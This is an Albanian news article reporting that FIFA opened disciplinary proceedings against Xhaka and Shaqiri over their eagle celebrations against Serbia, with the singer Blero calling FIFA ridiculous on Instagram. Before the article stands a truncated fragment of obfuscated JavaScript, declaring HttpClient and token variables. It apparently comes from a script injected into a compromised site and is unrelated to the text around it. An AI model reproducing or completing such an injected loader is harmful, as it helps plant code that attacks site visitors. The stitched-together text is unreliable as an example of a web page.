;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja si e komenton Blero hetimin e Xhakës dhe Shaqirit nga FIFA

By

FIFA ka nisur procedurat disiplinore kundër Granit Xhakës e Xherdan Shaqirit për shkak të mënyrës se si i festuan golat e tyre në fitoren e Zvicrës kundër Serbisë.

Bërja e Shqiponjës me duar nga Xhaka e Shaqiri është konsideruar nga serbët si provokim, prandaj FIFA tashmë ka nisur procedurat disiplinore kundër tyre.

FIFA hetimin e ka nisur pasi është ankuar Federata e Futbollit të Serbisë.

Hetimi bazohet në thyerjen e Nenit 54 të kodit disiplinor të FIFA-s i cili “ndalon provokimin e përgjithshëm të publikut”, por nisja e procedurave nga FIFA në asnjë mënyrë nuk nënkupton dënim për Xhakën e Shaqirin.

Gjithë këtë, këngëtari Blero e ka quajtur qesharake.

Përmes një imazhi të cilin artisti e ka postuar në Instagramin e tij ku shihet teksa ka bërë shqiponjën në staudiumin e Barcelonës, Blero ka thënë se ‘djemtë e FIFA janë qesharak’, duke i etiketuar ata.

“mooooos po ma bojka fifa band prej stadiumit te barces ? vetem pse e kom bo shqiponjen ? @fifaworldcup u guys are ridiculous”, ka shkruar këngëtari.

Ju kujtojmë që Xhaka e Shaqiri bënë shqiponjat pasi dhanë dy gola në ndeshjen kundër Serbisë./Prive.al

Artikuj të ngjashëm